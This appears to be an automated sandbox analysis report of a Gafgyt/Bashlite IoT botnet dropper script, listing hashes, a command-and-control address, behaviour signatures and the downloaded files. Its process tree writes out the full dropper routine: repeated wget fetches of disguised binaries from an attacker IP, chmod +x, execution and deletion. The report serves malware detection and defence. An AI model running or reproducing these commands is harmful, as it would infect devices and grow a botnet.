Analysis
-
max time kernel
122s -
max time network
125s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
-
submitted
11-11-2024 14:42
General
-
Target
bins.sh
-
Size
1KB
-
MD5
d588d0b22dad3b7798f9b2bf95da8cef
-
SHA1
014c3611137341068b4ca0bcceb877292951c8f4
-
SHA256
13812257a0e69ebd845f474473a63f956293186d5ec5ee9cc7564369b2fcf2b8
-
SHA512
f75477828c57c12b1e934366e1e70e314da13330087e8279412d22f8a6215d4d2b24c34d94ee028403987db6d9b5f57c249c445a44f046861aeecb91bedd21f5
Malware Config
Extracted
gafgyt
93.123.85.201:23
Signatures
-
Detected Gafgyt variant 12 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 12 IoCs
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Changes its process name 1 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
-
/usr/bin/wgetwget http://93.123.85.201/ntpd2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x ntpd2⤵
- File and Directory Permissions Modification
-
-
/tmp/ntpd./ntpd2⤵
- Executes dropped EXE
- Reads system routing table
- Changes its process name
- Reads system network configuration
-
-
/bin/rmrm -rf ntpd2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/sshd2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x sshd2⤵
- File and Directory Permissions Modification
-
-
/tmp/sshd./sshd2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf sshd2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/openssh2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x openssh2⤵
- File and Directory Permissions Modification
-
-
/tmp/openssh./openssh2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf openssh2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/bash2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x bash2⤵
- File and Directory Permissions Modification
-
-
/tmp/bash./bash2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf bash2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/tftp2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x tftp2⤵
- File and Directory Permissions Modification
-
-
/tmp/tftp./tftp2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf tftp2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/wget2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x wget2⤵
- File and Directory Permissions Modification
-
-
/tmp/wget./wget2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf wget2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/cron2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x cron2⤵
- File and Directory Permissions Modification
-
-
/tmp/cron./cron2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf cron2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/ftp2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x ftp2⤵
- File and Directory Permissions Modification
-
-
/tmp/ftp./ftp2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf ftp2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/pftp2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x pftp2⤵
- File and Directory Permissions Modification
-
-
/tmp/pftp./pftp2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf pftp2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/sh2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/sh./sh2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf sh2⤵
-
-
/usr/bin/wgetwget "http://93.123.85.201/[cpu]"2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x "[cpu]"2⤵
- File and Directory Permissions Modification
-
-
/tmp/[cpu]"./[cpu]"2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf "[cpu]"2⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/apache22⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x apache22⤵
- File and Directory Permissions Modification
-
-
/tmp/apache2./apache22⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf apache22⤵
-
-
/usr/bin/wgetwget http://93.123.85.201/telnetd2⤵
-
-
/bin/chmodchmod +x telnetd2⤵
- File and Directory Permissions Modification
-
-
/tmp/telnetd./telnetd2⤵
-
-
/bin/rmrm -rf telnetd2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
147KB
MD572aea001ce758bae3b7adc93a557bc5d
SHA16e92747f4ec45aec5650d34ed7b1d4899a21be1a
SHA256721ed0b47f6c546806173a0abab1e867ad2a953201da1d1a1d9cd19c0bfcba0f
SHA51249e95cf8d77a6905ea3989a829b1b6a556d40d0f83b6a40e7cf5fb184fcafc1c13c763736d8ffcb750657f87979389a84f88daa7fd37f48078145dc161cb89e9
-
Filesize
143KB
MD53d5b895c49817db7dfad1574226dcc31
SHA1a86f02c6ffd51a5ec540a80d51358012ce0d1fde
SHA2560ed7c92c832c1a9ac93891b4199a6dd8dc8f73edb60c75759349ff1d362e02b6
SHA512c1ceffda5d67393f31ebe9d330b2fd6811b20a36b1c8d7bac6a9bb4e338ccd8e3b10a122c08226ef1e6318e899bb1f402f8aad63d9b2bad28672c044b67d4c24
-
Filesize
140KB
MD5f33885bc2951d654477cb4f4d5f1c36f
SHA16ee7b0cd26df6ed278a52d73ae584232d230f72a
SHA25693c83f99138f321d5fd8ab5f5818cadaa0b344aa444b0dddc8431898c0e48b15
SHA512257fc1b0e2765b0962b325cd7ef7600066b10df0ab18017bb7c7f991503fcae6a72582d7dabab9ccc0c2c814e0efdbb62070283f0cc20ff884db469ca1c20a41
-
Filesize
134KB
MD507296b4d83d36917153f86d02870f998
SHA1157d139716af9ce6d840659bd888be42b4b9f8f5
SHA2562584273f6b8de024c6d3b55f784d068ea47e7ba5012e7b7de61ccfbaef17773c
SHA5128b697bf849fab0d2987c52e4e99470701d3ddc245e7a6f9c1adbf472b60ab852f85443d4d8f105b54b74c163012ecf5221a3d7777a9a2b6f2fbdf7f7609fedf8
-
Filesize
122KB
MD58bdb60f13472482a8a5450a81f8eb3b7
SHA154bca8986f8624cf2dfdbb1161bfc9f4de5ca1b1
SHA256c55c6595480a937f378325b8111dac31876628c4d0ac8916dadec49c614b07b5
SHA512a0aa1a7db1f9c900fa165f8ae7121d98c1678f701874fefa546dba3c912b3ddab25c9d2053fd0ad7d4452cc579fdeacfec39616fdef974751316fb910163540c
-
Filesize
170KB
MD5a2d9767a5c6e98a274d7e555d7e67199
SHA14364a2a706db5f716a22459d9416f16a3a2889c6
SHA2566a80f1ea14cf485a82fda55ee5a0195d99c6231f347d3aacb768377c74aff307
SHA512ee406ecd6eb9d6ef8b67b33c94808456d4dabec4ecb6bedb3dffd8fcd1599a15996f0c4e54796fc1ac1b64c3cd8ce6f39cb0f97bbf4cdab3d31557a7b832774b
-
Filesize
130KB
MD5b3a7c495d0cd76dffdc18c2aa4dc1175
SHA1cdec80ba321f75fc6dded020913ce21453acd85a
SHA25631e67444d9ba8615c570bd4effff1801e4fd9c0f3431da069b0b730dbc60d58c
SHA5121fdf38e8c92bb21c236588a01e3b0ce0e485381e1c392356b57ba46e4c9dbd609b9422a9dd2d44e5dfb7ff1f17dd5dc20c9fe02f890d2584e9e07a69df5845c6
-
Filesize
137KB
MD59992d85d1f20c7ba2a3af31f33d47382
SHA1daab1858efab60c8d5b2bbc8bc3ae8f7d3598c56
SHA256948cd4d1e32391c60b00c14021d6a58450ccd15842b0d004f97bdb1a2cac8e18
SHA51228dea01f6b8772fbfa9ba8ac70f8516c5eb00c9dd31c8983fe04a9c4ae878b484acc149a4e68167f7b08291bcb81d5194d0eb60287b0bda35c71a62b4bb15a72
-
Filesize
148KB
MD509e9ecd0d275ab121188710cef1741eb
SHA1a13cf836836490b3cf579da88bfac83c47c66ce7
SHA256fdb89dba5487dfcd6b84ae9afe612283b5ac0260aba2caca9db38dd4390403df
SHA512492e316b053bc66e82291a84ddc75aad9fc3274f05120abbc644f6f08f3af2fe95ed6bda9c055d04c7f213a4ed657481a9ed34d9252bcfff32187860d63f5ba4
-
Filesize
170KB
MD5fd39dae5a09f57762f4019672e3fd3fb
SHA15ef0451c1edf6fd8257b254289bf8a5d74fe19c7
SHA256d485508087f98610ad07803257ca0e84a3994c3af1ca841d919bc7782c6cca70
SHA5120c0385a9e9fa58e1702a0428e3b58eea9135d625bdc745453f46fb836b00e173cdeaa2e47bc212b35fc99e2b576885e1c37ae1cd2eb15a0cf63fcd2b8be6af82
-
Filesize
160KB
MD52a45d315342063a6ca92c63f5f77287a
SHA194dbc030cbb625fea324b1dd9838e3ba926bb5a3
SHA2567aebc6a86fda69a4889e18ff8d7d1b6b0bd227070793298450c9ec107f66fb41
SHA512ed6e8126a68212aa2c39a7696c4c508808c53e98ca88978b89c59c375c1af44d084ce6937406da6c358ecd96f17034d09bc8b637e7268330ba2643f29ff5f93f
-
Filesize
122KB
MD52929269020e09c372861ea718c97781e
SHA19850ee12342a57c760957892609c6c42f3acf3ed
SHA25619d01e944b91478df283f68b18f87c0a2366db50a60c861083ea24e05db698df
SHA5121a667987a534ce682a80ff456ae0adf2418418eed323c974d2021dffce8df51942af1037f1780056fb6b332929934046f0b3953ae0585b914796bc611bb31bf4